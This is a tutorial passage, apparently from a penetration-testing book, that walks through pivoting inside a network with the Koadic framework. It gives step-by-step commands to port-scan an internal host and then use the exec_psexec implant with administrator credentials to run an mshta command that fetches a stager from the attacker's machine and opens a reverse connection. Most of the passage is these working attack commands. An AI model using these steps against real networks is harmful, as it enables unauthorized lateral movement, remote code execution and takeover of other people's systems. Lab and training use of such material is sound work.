Pivoting

We now have access to the 192.168.10.171 system and using the credentials of this system, we can move around in the network and try to access another system that is in the same network. However, for this to work, we need to know the services running on the system. For this, we can use the tcp scanner implant for port scanning, which can be done by running the following commands:

use implant/scan/tcp 
info 
set rports 135,139,445 
set rhosts 192.168.10.130 
set zombie 0

The implant is ready to roll! Now we just need to run it:

run  

The mentioned ports are open, which means we can access the Remote Procedure Call (RPC) server on port 445 of this system. The main idea here is to access the RPC server to execute remote commands to execute our given stager command, which will get us the reverse connection over MSHTA. For this, we can use the exec_psexec implant and set the cmd to
mshta http://192.168.10.122:9999/fGLYN, which will execute our stager command on the given internal system:

use implant/pivot/exec_psexec 
info 
set cmd "mshta http://192.168.10.122:9999/fGLYN"

We also need to give the credentials for it:

set smbuser administrator 
set smbpass 123456 
set zombie 1 

The implant is ready to run, so let's run it:

Run 

As you can see from the preceding output, when we run the implant, it executed our given CMD to get hooked up by our stager.

Checking on all the zombies, we can see clearly that we now have access to 192.168.10.130 as well:

Using Koadic can be chaotic, depending upon the imagination of the user.